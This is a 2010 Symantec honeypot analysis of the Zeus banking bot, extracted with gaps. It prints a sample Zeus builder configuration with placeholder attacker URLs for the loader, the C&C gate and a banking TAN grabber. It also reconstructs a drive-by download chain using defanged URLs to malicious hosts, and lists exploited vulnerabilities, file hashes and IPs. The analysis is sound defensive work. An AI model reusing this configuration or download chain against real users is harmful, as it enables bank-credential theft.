Professional Documents
Culture Documents
HoneyNet Analysis
HoneyPot ID
Ensure that antivirus software is current to detect this
377850
threat.
Ensure that installed software is fully patched to avoid
compromise.
There are many versions of Zeus. The bot has modules that influence browser processes to steal
browsing information such as authentication credentials. At the time of writing, we are aware of modules
that support Internet Explorer, Mozilla Firefox, and Opera browsers. We will likely see other modules to
support different browsers as Zeus is actively maintained. When an attacker wishes to start a new botnet,
they will either purchase the latest version of Zeus from the malware authors or will download one of the
many leaked versions of the bot for free.
Packers are often used by attackers that use Zeus to modify the bot binary and prevent this common bot
from being detected by antivirus software. Since the Zeus bot doesn’t have any methods of propagation,
distribution of the bot is left up to the attacker creating the bot network. This is why the campaigns that
are used to install this bot vary wildly on a botnet-to-botnet basis. Many methods can be used to deliver
the bot to the victim; the following are the most common that are seen in the wild:
Email spam campaigns to lure victims to a malicious site containing exploits or a message crafted
to convince the victim to install the bot from an email attachment.
Malicious sites that couple drive-by exploit kits and social engineering to install the bot on a
victim’s computer when the victim visits the site.
Pay-per-install services where the attacker pays a third party to install the malware onto a
victim’s computer.
The client-side exploit kits that are commonly seen with a Zeus bot attack are not a part of the Zeus bot
builder. These kits are bought and sold separately; the attacker configures them to install the copy of
Zeus bot that the attacker has built for the current botnet campaign. The attacker configures the exploit
kit so that the Zeus bot is installed when a victim is successfully compromised by the drive-by exploit kit.
This is typically a trivial operation where the attacker simply specifies a URL that stores the attacker’s
copy of Zeus bot. The versatility of Zeus coupled with an exploit kit is likely one of the reasons why
reporters often get confused by this malware and describe it as new.
We will not cover exploit kits in this analysis, but some of the common kits that are popular are Unique,
Phoenix, YES, Eleonore, Liberty, and a relative newcomer called Fragus, which is currently being sold for
$800 dollars. (See Figure 1 for a screenshot of the configuration panel for Fragus.) These exploit kits are
hosted on a webserver. When the victim visits this webserver, their system may be compromised if they
are vulnerable to one of the vulnerabilities that the exploit kit targets.
Building Zeus
The process to build a custom Zeus bot for the attacker’s botnet is very easy. The process is driven by a
GUI application (Figure 2) and a configuration file. The attacker selects a configuration file using the
Browse… button in the builder section of the GUI.
entry "StaticConfig"
;botnet "btn4"
timer_config 60 1
timer_logs 1 1
timer_stats 20 1
url_config "%attacker ip%/cfg.bin"
url_compip "%attacker ip%/ip.php" 4096
encryption_key "123123"
;blacklist_languages 1049
end
entry "DynamicConfig"
url_loader "%attacker ip%/botname.exe"
url_server "%attacker ip%/gate.php"
file_webinjects "webinjects.txt"
entry "AdvancedConfigs"
;"/cfg1.bin"
end
entry "WebFilters"
"!*.microsoft.com/*"
"@*/login.osmp.ru/*"
end
entry "WebDataFilters"
;"http://mail.rambler.ru/*" "passw;login"
end
entry "WebFakes"
;"http://www.google.com" "http://www.yahoo.com" "GP" "" ""
end
entry "TANGrabber"
"https://banking.*.de/cgi/ueberweisung.cgi/*" "S3R1C6G" "*&tid=*"
end
entry "DnsMap"
;127.0.0.1 microsoft.com
end
end
The encryption_key is used to obfuscate data sent to and from the C&C web application. Some of the
other sections are also updated to add websites and fields that the attacker wishes to monitor and steal
information from. Finally, the DnsMap section is used to resolve a domain name to an attacker-specified
address. Once the attacker has finished editing the configuration file, they then build the bot using the
GUI’s Build Config and Build Loader buttons. The customized Zeus bot is now ready to be deployed.
At this point, the attacker will likely pack the file to make sure that it is not detected by current antivirus
signatures.
When the attacker installs the bot on a victim’s computer, the bot will be displayed in this control panel
(see Figure 5 below). The web GUI allows the attacker to easily monitor this bot, to profile the
compromised system, and to send commands for the bot to obey.
Figure 3. Zeus bot web control panel with one bot connected.
Using the control panel, the attacker can run the commands listed in Table 1. Note that the functionality
of the bot varies from version to version. These commands are supported by Zeus bot version 1.2.7.19.
When the JavaScript was decoded, we found that it contained exploits for the following vulnerabilities:
AOL Radio AmpX ActiveX Control 'ConvertFile()' Buffer Overflow Vulnerability (BID: 35028)
Microsoft Active Template Library Header Data Remote Code Execution Vulnerability (BID:
35558) [DirectShow ActiveX Control vector]
Microsoft Internet Explorer ADODB.Stream Object File Installation Weakness (BID: 10514)
Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download Vulnerability (BID:
30114)
Adobe Reader 'util.printf()' JavaScript Function Stack Buffer Overflow Vulnerability (BID: 30035)
Adobe Acrobat and Reader Collab 'getIcon()' JavaScript Method Remote Code Execution
Vulnerability (BID: 34169)
Adobe Reader and Acrobat (CVE-2009-2994) U3D 'CLODMeshDeclaration' Buffer Overflow
Vulnerability (BID: 36689)
Adobe Acrobat and Reader Multiple Arbitrary Code Execution and Security Vulnerabilities (BID:
27641/CVE-2007-5659)
The exploit pack also included exploits for a Java as well as an Adobe Flash vulnerability. Unfortunately,
we didn’t have enough data captured to be able to identify the exact vulnerabilities that were being
exploited by each of these additional exploits. It’s difficult to identify the exploit kit that was used in the
compromise of this honeypot, but based on the exploits that are included and the script format, we
suspect that it’s either the Eleonore or Phoenix exploit pack, but this is unconfirmed and is merely
conjecture.
When the Microsoft Active Template Library Header Data Remote Code Execution Vulnerability (BID
35558) was exploited on our honeypot, the shellcode that runs will find the path to the local temporary
files directory using GetTempPathA().
The shellcode then loads the urlmon.dll library and gets the address of URLDownload() from this
library using the GetProcAddress() function. Next, the shellcode attempts to download an executable
from hxxp://cronnerberg.com/new/load.php?i=10 to %TempPath%\pdfupd.exe. Once the
The webserver responds to this request with a list of URLS that are delimited by a semicolon character:
hxxp://atx777.homeip.net/ldx.exe;hxxp://atx777.homeip.net/severa/veton.exe;hx
xp://atx777homeip.net/tbot.exe;
The pdfupd.exe executable will download each of these executables and then install them on the
compromised system. The file ldx.exe is the Zeus bot binary in this compromise; we can see the
request for the bot configuration conflake9.bin in Figure 5.
In addition to installing Zeus bot in this compromise, this attacker also installed Waledac. This malware is
known to have a pay-per-install program that miscreants can use to monetize their activity. Since Zeus
bot is designed to collect credentials from web-browsing activity and since Waledac was also dropped
onto this system, this may mean that this attacker had financial motivations.
Because Zeus bot is freely available, easy to use and configure, and contains powerful capabilities,
attackers commonly use it. Attack scenarios will differ on a case-by-case basis, depending on the
motivations and skill of the attacker building the bot network. The Zeus bot is most often employed in
attacks that have financial motivations.
The best defense against Zeus bot is network- and host-based IPS/IDS, current antivirus software, and
keeping network systems up to date with current patches for software vulnerabilities. The malware that
was installed during this attack against our Honeypot is detected by Symantec AntiVirus as Trojan
Horse.
Attack data
Filenames
Filename: pdfupd.exe
SHA1: 7f7403f2c476a2b8aaa09c224dba6f2de2aab269
Filename: ldx.exe
Filename: tbot.exe
SHA1: 1d4d3f3cd3642f102c7f16609e02462fc63fc5d8
Filename: veton.exe
SHA1: b06e994355bda719bd98552933c3b3e2d371bfce
System behavior
Outbound HTTP activity from the affected system.
IP addresses
The following domain names and IPs were involved in this attack:
cronnerberg.com (92.60.176.38)
atx777.homeip.net (95.169.186.103
lake777.homeip.net (95.169.186.103)
Change log
Version 1: February 24, 2010, 23:00 GMT
Initial HoneyNet Analysis released.
Contact information
World Headquarters
Symantec Corporation
20300 Stevens Creek Blvd.
Cupertino, CA 95014
U.S.A.
+1 408 517 8000
www.symantec.com
About Symantec
Symantec, the world leader in Internet security technology, provides a broad range of content and
network security software and appliance solutions to enterprises, individuals, and service providers. The
company is a leading provider of client, gateway, and server security solutions for virus protection,
firewall and virtual private network, vulnerability management, intrusion detection, Internet content and
e-mail filtering and remote management technologies, as well as security services to enterprises and
service providers around the world. Symantec's Norton brand of consumer security products is a leader in
worldwide retail sales and industry awards. Headquartered in Cupertino, Calif., Symantec has worldwide
operations in 38 countries. For more information, please visit www.symantec.com.
DeepSight Conditions: NO WARRANTIES, EXPRESSED OR IMPLIED, INCLUDING, WITHOUT LIMITATION, THE IMPLIED
WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT, SHALL APPLY TO THE
DEEPSIGHT SERVICES OR THE MATERIALS PROVIDED BY SYMANTEC TO USERS OF THE DEEPSIGHT SERVICES. SYMANTEC
PROVIDES THE SERVICE(S) AND MATERIALS “AS IS” AND “AS AVAILABLE.” IN NO EVENT WILL SYMANTEC BE LIABLE FOR THE
TRUTH, ACCURACY, RELIABILITY OR COMPLETENESS OF THE SERVICE(S) OR MATERIALS. SYMANTEC MAKES NO WARRANTY
THAT THE SERVICE(S) OR MATERIALS WILL BE UNINTERRUPTED OR TIMELY, OR THAT THEY WILL PROTECT AGAINST
COMPUTER VULNERABILITIES. Please refer to your services agreement or certificate for further information on conditions of use for
the Services and materials.
Trademarks: Symantec, the Symantec logo, and DeepSight are US registered trademarks of Symantec Corporation or its
subsidiaries. DeepSight Analyzer, DeepSight Extractor, and Bugtraq are trademarks of Symantec Corporation or its subsidiaries.
Other brands and products are trademarks of their respective holders.
Quoting Symantec Information and Data: Authorized Users of Symantec's Deep Sight Services may use or quote individual
sentences and paragraphs from the materials provided as part of the Services, but not large portions or the majority of such
materials, solely for purposes of internal communications. Unless otherwise specifically agreed in writing by Symantec, no external
publication of all or any portion of any materials provided by Symantec is permitted.
Copyright © 2010 Symantec Corporation. All rights reserved. Reproduction is forbidden unless authorized.